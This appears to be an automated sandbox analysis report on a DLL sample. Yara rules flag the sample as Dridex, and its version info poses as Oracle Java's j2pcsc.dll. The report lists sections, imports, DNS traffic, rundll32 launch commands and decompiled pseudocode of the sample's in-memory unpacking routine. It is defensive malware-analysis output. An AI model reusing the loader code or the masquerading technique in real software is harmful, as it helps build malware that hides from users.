                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x233220x23400False0.759010693706data7.5511794748IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x250000x2ab40x2c00False0.770774147727data7.47863118679IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .pdata0x280000x37da0x1800False0.78564453125MMDF mailbox7.42299069747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x2c0000x3a00x400False0.4091796875data3.06807977608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x2d0000x2580x400False0.5263671875data4.16057022331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_VERSION0x2c0600x33cdata

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      msvcrt.dllmemset
                                                                                                      ADVAPI32.dllRegOverridePredefKey
                                                                                                      ole32.dllCreatePointerMoniker, CreateStreamOnHGlobal
                                                                                                      USER32.dllTranslateMessage
                                                                                                      OPENGL32.dllglTexSubImage1D
                                                                                                      KERNEL32.dllCloseHandle, OutputDebugStringA, LoadLibraryExW, CreateFileW, GetProfileSectionW, LoadLibraryW, GetProfileSectionA, OpenSemaphoreW
                                                                                                      RASAPI32.dllRasGetConnectionStatistics
                                                                                                      CLUSAPI.dllClusterEnum

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      LoxmtYt10x10027776

                                                                                                      Version Infos

                                                                                                      DescriptionData
                                                                                                      LegalCopyrightCopyright 2018
                                                                                                      InternalNamej2pcsc
                                                                                                      FileVersion8.0.1710.11
                                                                                                      Full Version1.8.0_171-b11
                                                                                                      CompanyNameOracle Corporation
                                                                                                      ProductNameJava(TM) Platform SE 8
                                                                                                      ProductVersion8.0.1710.11
                                                                                                      FileDescriptionJava(TM) Platform SE binary
                                                                                                      OriginalFilenamej2pcsc.dll
                                                                                                      Translation0x0000 0x04b0

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      May 4, 2021 21:44:14.526757002 CEST5507453192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:14.575486898 CEST53550748.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:44:14.751502037 CEST5451353192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:14.809906006 CEST53545138.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:44:15.445355892 CEST6204453192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:15.494009972 CEST53620448.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:44:16.374154091 CEST6379153192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:16.425174952 CEST53637918.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:44:17.264143944 CEST6426753192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:17.321329117 CEST53642678.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:44:18.235455036 CEST4944853192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:18.293767929 CEST53494488.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:44:19.609390020 CEST6034253192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:19.661343098 CEST53603428.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:44:20.732441902 CEST6134653192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:20.781251907 CEST53613468.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:44:21.216137886 CEST5177453192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:21.285295963 CEST53517748.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:44:21.667448997 CEST5602353192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:21.717058897 CEST53560238.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:44:22.792475939 CEST5838453192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:44:22.845525026 CEST53583848.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:45:04.272495031 CEST6026153192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:45:04.324301004 CEST53602618.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:45:05.092786074 CEST5606153192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:45:05.151158094 CEST53560618.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:45:05.669657946 CEST5833653192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:45:05.726613045 CEST53583368.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:45:05.910166979 CEST5378153192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:45:05.915132999 CEST5406453192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:45:05.958775043 CEST53537818.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:45:05.963886976 CEST53540648.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:45:06.893409967 CEST5281153192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:45:06.946862936 CEST53528118.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:45:08.544219017 CEST5529953192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:45:08.600963116 CEST53552998.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:45:08.701235056 CEST6374553192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:45:08.749883890 CEST53637458.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:45:09.874303102 CEST5005553192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:45:09.923393011 CEST53500558.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:02.174242020 CEST6137453192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:02.233520985 CEST53613748.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:11.093945026 CEST5033953192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:11.143449068 CEST53503398.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:17.638186932 CEST6330753192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:17.695493937 CEST53633078.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:18.778915882 CEST4969453192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:18.827673912 CEST53496948.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:19.348090887 CEST5498253192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:19.396893024 CEST53549828.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:24.240775108 CEST5001053192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:24.333915949 CEST53500108.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:24.819046974 CEST6371853192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:24.876785994 CEST53637188.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:25.367489100 CEST6211653192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:25.427855015 CEST53621168.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:25.885755062 CEST6381653192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:25.945226908 CEST53638168.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:26.413902998 CEST5501453192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:26.473494053 CEST53550148.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:27.473649025 CEST6220853192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:27.534251928 CEST53622088.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:27.925471067 CEST5757453192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:27.974205017 CEST53575748.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:49.367012978 CEST5181853192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:49.415895939 CEST53518188.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:50.807249069 CEST5662853192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:50.861068964 CEST53566288.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:50.895876884 CEST6077853192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:50.944536924 CEST53607788.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:46:52.432234049 CEST5379953192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:46:52.497481108 CEST53537998.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:08.948781013 CEST5468353192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:09.047935963 CEST53546838.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:09.733320951 CEST5932953192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:09.754313946 CEST6402153192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:09.822058916 CEST53640218.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:09.910907984 CEST53593298.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:10.663146973 CEST5612953192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:10.720233917 CEST53561298.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:11.251727104 CEST5817753192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:11.308666945 CEST53581778.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:12.180797100 CEST5070053192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:12.242857933 CEST53507008.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:12.726773024 CEST5406953192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:12.777582884 CEST53540698.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:12.979967117 CEST6117853192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:13.030441046 CEST53611788.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:13.563133001 CEST5701753192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:13.620109081 CEST53570178.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:14.850735903 CEST5632753192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:14.899684906 CEST53563278.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:15.768712044 CEST5024353192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:15.825768948 CEST53502438.8.8.8192.168.2.6
                                                                                                      May 4, 2021 21:47:16.333626032 CEST6205553192.168.2.68.8.8.8
                                                                                                      May 4, 2021 21:47:16.390731096 CEST53620558.8.8.8192.168.2.6

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                      May 4, 2021 21:45:05.726613045 CEST8.8.8.8192.168.2.60x7b5No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                      May 4, 2021 21:46:24.333915949 CEST8.8.8.8192.168.2.60x7b1bNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                      May 4, 2021 21:46:24.876785994 CEST8.8.8.8192.168.2.60x3fabNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                      May 4, 2021 21:46:25.427855015 CEST8.8.8.8192.168.2.60xf791No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                      May 4, 2021 21:46:25.945226908 CEST8.8.8.8192.168.2.60xf5b1No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: loaddll32.exe PID: 4240 Parent PID: 6020

                                                                                                      General

                                                                                                      Start time:21:44:21
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll'
                                                                                                      Imagebase:0xe80000
                                                                                                      File size:116736 bytes
                                                                                                      MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: cmd.exe PID: 5632 Parent PID: 4240

                                                                                                      General

                                                                                                      Start time:21:44:21
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',#1
                                                                                                      Imagebase:0x2a0000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 5100 Parent PID: 4240

                                                                                                      General

                                                                                                      Start time:21:44:22
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll,LoxmtYt
                                                                                                      Imagebase:0xe80000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 5648 Parent PID: 5632

                                                                                                      General

                                                                                                      Start time:21:44:22
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',#1
                                                                                                      Imagebase:0xe80000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: WerFault.exe PID: 6092 Parent PID: 5648

                                                                                                      General

                                                                                                      Start time:21:45:03
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 764
                                                                                                      Imagebase:0x800000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: WerFault.exe PID: 5932 Parent PID: 5100

                                                                                                      General

                                                                                                      Start time:21:45:06
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 888
                                                                                                      Imagebase:0x800000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 644 Parent PID: 4240

                                                                                                      General

                                                                                                      Start time:21:45:08
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',DllCanUnloadNow
                                                                                                      Imagebase:0xe80000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000D.00000002.659180073.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 6004 Parent PID: 4240

                                                                                                      General

                                                                                                      Start time:21:45:08
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',DllGetClassObject
                                                                                                      Imagebase:0xe80000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000F.00000002.663523541.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 2908 Parent PID: 4240

                                                                                                      General

                                                                                                      Start time:21:45:08
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiAddFileToInstance
                                                                                                      Imagebase:0xe80000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000010.00000002.578383295.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 5332 Parent PID: 4240

                                                                                                      General

                                                                                                      Start time:21:45:09
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiAddParameter
                                                                                                      Imagebase:0xe80000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000011.00000002.578360981.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 5492 Parent PID: 4240

                                                                                                      General

                                                                                                      Start time:21:45:09
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiCancel
                                                                                                      Imagebase:0xe80000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000012.00000002.660063361.0000000010001000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: WerFault.exe PID: 396 Parent PID: 644

                                                                                                      General

                                                                                                      Start time:21:46:17
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 752
                                                                                                      Imagebase:0x800000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: WerFault.exe PID: 3520 Parent PID: 6004

                                                                                                      General

                                                                                                      Start time:21:46:17
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 756
                                                                                                      Imagebase:0x800000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: WerFault.exe PID: 3760 Parent PID: 5492

                                                                                                      General

                                                                                                      Start time:21:46:25
                                                                                                      Start date:04/05/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 764
                                                                                                      Imagebase:0x800000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Chronological Activities

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >

                                                                                                        Analysis Process: rundll32.exe PID: 5100 Parent PID: 4240 rundll32.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 02FC193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E02FC193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				char* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				int _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr* _t135;
				int _t142;
				int _t150;
				int _t154;
				intOrPtr _t169;
				int _t175;
				intOrPtr _t217;
				void* _t224;
				intOrPtr _t227;
				void* _t234;
				intOrPtr _t238;
				intOrPtr _t245;
				intOrPtr _t249;
				DWORD* _t263;
				void* _t267;
				intOrPtr* _t270;
				intOrPtr* _t271;

				_t135 = _a4;
				_v20 = 0;
				_t234 =  *((intOrPtr*)(_t135 + 0x28));
				 *0x2fc4418 = 1;
				asm("movaps xmm0, [0x2fc3010]");
				asm("movups [0x2fc4428], xmm0");
				_v48 = _t135;
				_v52 =  *((intOrPtr*)(_t135 + 0x44));
				_v56 =  *((intOrPtr*)(_v48 + 0xc));
				_v180 = _t234;
				_v176 =  *((intOrPtr*)(_v48 + 0x48));
				_v172 = 4;
				_v168 =  &_v20;
				_v60 =  *((intOrPtr*)(_t135 + 0x30));
				_v64 = 4;
				_v68 = _t234;
				_v72 =  &_v20;
				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
				_v76 = _t142;
				_v180 = _v68;
				_v176 = 0;
				_v172 =  *((intOrPtr*)(_v48 + 0x48));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E02FC173B();
				E02FC21C2(_v68,  *_v48, _v60);
				E02FC173B( *_v48, 0, _v60);
				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t270 = _t267 - 0x84;
				_t224 = _v68;
				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
				_v96 = _t150;
				_v100 = _v68 + 0x3c;
				_v104 = _t224;
				_v108 = _t249;
				if(_t249 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v56 != 0) {
					_v116 = 0;
					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t169 = _v120;
						_v152 = _t169;
						_t245 = _v152;
						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
						_v176 =  *((intOrPtr*)(_t245 + 8));
						_v172 =  *((intOrPtr*)(0x2fc4418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v168 =  &_v20;
						_v156 = _v116;
						_t175 = VirtualProtect(??, ??, ??, ??); // executed
						_t270 = _t270 - 0x10;
						_t217 = _v156 + 1;
						_v160 = _t175;
						_v116 = _t217;
						_v120 = _v152 + 0x28;
						if(_t217 == _v56) {
							goto L12;
						}
					}
				}
				L12:
				 *_t270 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
				_t154 = DisableThreadLibraryCalls(??);
				_t271 = _t270 - 4;
				_t227 =  *_v100;
				_v164 = _t154;
				_v124 = _t227;
				_v128 = _v68;
				if(_t227 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t238 = _v48;
				_v44 =  *((intOrPtr*)(_t238 + 0x40));
				_v40 =  *((intOrPtr*)(_t238 + 0x24));
				_v36 =  *((intOrPtr*)(_t238 + 0x38));
				_v32 =  *((intOrPtr*)(_t238 + 0x50));
				_v28 =  *((intOrPtr*)(_t238 + 0x18));
				_v24 = _v132;
				 *_t271 = _t238;
				_v180 = 0;
				_v176 = 0x5c;
				_v136 =  &_v44;
				_v140 = 0;
				_v144 = 0x5c;
				_v148 =  *((intOrPtr*)(_v128 + 0x28));
				E02FC173B();
				if(_v148 != 0) {
					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}





























































                                                                                                        0x02fc1949
                                                                                                        0x02fc1957
                                                                                                        0x02fc195e
                                                                                                        0x02fc1961
                                                                                                        0x02fc196b
                                                                                                        0x02fc1972
                                                                                                        0x02fc197c
                                                                                                        0x02fc1982
                                                                                                        0x02fc198b
                                                                                                        0x02fc1994
                                                                                                        0x02fc1997
                                                                                                        0x02fc199b
                                                                                                        0x02fc19a3
                                                                                                        0x02fc19aa
                                                                                                        0x02fc19ad
                                                                                                        0x02fc19b0
                                                                                                        0x02fc19b3
                                                                                                        0x02fc19b6
                                                                                                        0x02fc19d0
                                                                                                        0x02fc19d6
                                                                                                        0x02fc19d9
                                                                                                        0x02fc19e1
                                                                                                        0x02fc19e5
                                                                                                        0x02fc19e8
                                                                                                        0x02fc19eb
                                                                                                        0x02fc19ee
                                                                                                        0x02fc19f1
                                                                                                        0x02fc1a0c
                                                                                                        0x02fc1a28
                                                                                                        0x02fc1a4d
                                                                                                        0x02fc1a4f
                                                                                                        0x02fc1a58
                                                                                                        0x02fc1a5b
                                                                                                        0x02fc1a65
                                                                                                        0x02fc1a68
                                                                                                        0x02fc1a6b
                                                                                                        0x02fc1a6e
